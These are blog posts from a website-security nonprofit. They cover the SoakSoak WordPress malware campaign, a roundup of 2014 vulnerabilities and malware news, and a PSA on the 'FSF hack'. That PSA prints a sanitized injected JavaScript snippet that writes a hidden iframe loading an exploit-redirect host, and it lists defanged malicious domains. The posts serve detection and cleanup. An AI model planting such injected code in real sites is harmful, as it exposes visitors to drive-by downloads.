SoakSoak malware: Infection hallmarks and removal resources

Posted on December 24, 2014 - 14:38 by ccondon

On December 14, Sucuri wrote about the massive “SoakSoak” malware campaign targeting WordPress sites through a vulnerability in the RevSlider plugin. The plugin is wrapped into many WordPress themes (as disclosed to Sucuri by DreamHost’s Mika Epstein in September). Google blacklisted thousands of sites that they detected as having been infected with the malware. Safe Browsing diagnostics for soaksoak[.]ru indicate that Google has detected SoakSoak infections on more than 17,000 sites. Sucuri reckons over 100K sites were compromised in the campaign’s initial onslaught.

Sucuri has some snippets of bad code and cleanup advice here and here. Webmasters who have already cleaned up should note that the malware has morphed and has been reinfecting sites—more on this in our notes below.  

Our testing queue ballooned as a result of the attack, since many webmasters whose sites were infected have been requesting StopBadware reviews. We’ve also seen a number of posts on various forums ( forum, Google’s malware and hacked site forum, our own community forum) with questions and advice on removing the malware.

The good news is that webmasters appear to be having success cleaning up SoakSoak infections. The following are some notes from our testing team on what we’re seeing with respect to this campaign. 

Obfuscated JavaScript

Initially, we saw a lot of obfuscated code on .js pages. For example, we found the following on pages such as caption.js:

obfuscated JavaScript SoakSoak malware


Right now, we’re seeing a lot of false “collect.js” scripts inserted into homepages, either right at the beginning of a <script> tag accompanied by other legitimate js files, or more conspicuously right after the </head> tag. 

The script itself will not deliver to our testers, but it always runs from one of a few IPs, most commonly or The former has been replacing the latter during recent tests, suggesting that the IP itself is periodically changing. 

The code is innocuous-looking other than its placement and the naked IP. Some examples: 

Bad script SoakSoak malware campaign

Another bad script from SoakSoak

Deleting this code gets rid of the infection (though notably not any backdoors or vulnerabilities that allowed the compromise to begin with), and webmasters do seem to be getting rid of it. 

A note on cleanup

If your site has been affected, note Sucuri's warning:

We are hearing a lot of recommendations online to just replace the swfobject.js and template-loader.php files to remove the infection...It does remove the infection, but does not address the left over backdoors and initial entry points.

In this case, the infection vector is the RevSlider plugin. In addition to getting rid of the bad code (but please don't delete files at random!), you'll need to update the plugin and any themes you're using that have RevSlider wrapped into them. Ask your hosting provider and/or a professional website malware removal specialist for help if you're unsure about the files you're modifying. You can always ask for help on free forums like the forum, StopBadware's community forum, and Google's malware and hacked sites forum

Community news and analysis: September/October 2014

Posted on November 4, 2014 - 16:19 by ccondon

We’ve been extra busy at StopBadware this fall. We're organizing some cool research, we trained a fabulous new website tester (check out last week’s website PSA), and we attended a few different security conferences and meetings. Our community news roundup this week covers both September and October.

Featured news: A trio of security vulnerabilities

Shellshock: A serious security vulnerability was discovered in bash, a commonly used tool on many Unix, Linux, and Mac OS X systems. When exploited, the bug allows attackers to run arbitrary shell commands on vulnerable servers. See excellent coverage here from AutomatticSiteLockFortinet, and CloudFlare.  

POODLE: Google researchers disclosed a vulnerability in SSLv3 that can allow an attacker to access private information from within an encrypted transaction. POODLE affects any browser or site that supports SSLv3. Sites using this version of SSL should upgrade to a newer version of TLS. See our partners’ coverage of POODLE: GoogleMozillaQualysFortinet.

Highly critical security vulnerability in Drupal: We can't stress this one enough. On October 15, the Drupal team released a highly critical security advisory about a SQL injection vulnerability in the Drupal core. On October 29, Drupal published a follow-up PSA stating that automated attacks began compromising vulnerable Drupal sites as soon as the initial security advisory was released, and webmasters should assume every Drupal 7 website was compromised unless updated within seven hours of when Drupal disclosed the security flaw on October 15. Sophos and Sucuri have more details.

Malware news and analysis

ESET: Two recently patched Adobe Flash exploits now used in exploit kits, an excellent technical paper on bootkits (PDF via Virus Bulletin), another great paper on the evolution of webinject, and details on August BlackEnergy PowerPoint campaigns.

Fortinet: A look at the crypto in Android’s Emmental malware (see also Axelle Apvrille’s post on how to undermine the malware and redirect intercepted messages), a new variant of third-generation Pushdo malware, and the evolution of Tinba malware.

Sophos: A resurgence in VBA malware, what you need to know about the Sandworm zero-day malware, and a (Down Under) speed camera phish that leads to CryptoLocker-esque ransomware.

Sucuri: Manipulating WordPress plugin functions to inject malware, WordPress websites still being hacked via MailPoet plugin vulnerability, CMD process contributing to reinfection on Microsoft IIS servers.

Other security news

Google on strengthening two-step verification with Security Key: “Security Key is a physical USB second factor that only works after verifying the login site is truly a Google website.”

Mozilla on implementing a faster Content Security Policy, and why using CSP improves security for those building new websites.

'Free Software Foundation' hack

Posted on October 31, 2014 - 11:30 by ccondon

Happy Halloween, everyone! This is a PSA from the StopBadware website testing team. Our testers have recently been seeing dozens of sites hacked with a malicious iframe that loads content from from very bad places. We're referring to this as the FSF hack. 

Here is an example of the (sanitized) bad code:

/* Copyright (C) 2007 Free Software Foundation, Inc. hxxp://fsf. org/ */ function JeckPostal() { var q = navigator.userAgent; var b = (q.indexOf("Chrome") > -1 || q.indexOf("Android") > -1 || q.indexOf("Macintosh") > -1 || q.indexOf("Linux") > -1 || q.indexOf("IEMobile") > -1 || q.indexOf("FreeBSD") > -1 || q.indexOf("iPhone") > -1 || q.indexOf("iPad") > -1); if (!b) { document.write('<ifram'+'e src="hxxp://faskarao. arawat. com/welcometo15. html" style="position:absolute;left: -700px;top: -700px;" height="132" width="132"></ifr'+'ame>'); } } JeckPostal(); /*

What does it do? This creates an off-screen iframe that loads content from a site which is usually a redirect to an exploit. The site from which the content is being loaded often has randomly generated hex strings in front of the domain. For example:

hxxp://c22c38348. bigbozz. org
hxxp://309fd22fa. aerofitstudio. net
hxxp://ed757fc56. azov-sportschool2. ru

These sites commonly redirect to maliciously registered pages which attempt to download something onto the user's PC.

Where is it found? This is typically injected at the beginning of JavaScript files loaded into your HTML. It will usually be before any other type of copyright information, and is nearly always preceded by the "2007 Free Software Foundation" comment. 

RedLeg, one of our community forum mods, has a fantastic, very detailed writeup of this hack. If your site is hacked, take a look at RedLeg's info, our tutorials, and these resources to help you clean up!

Thanks to our superstar testing intern Blake for the tip on this one!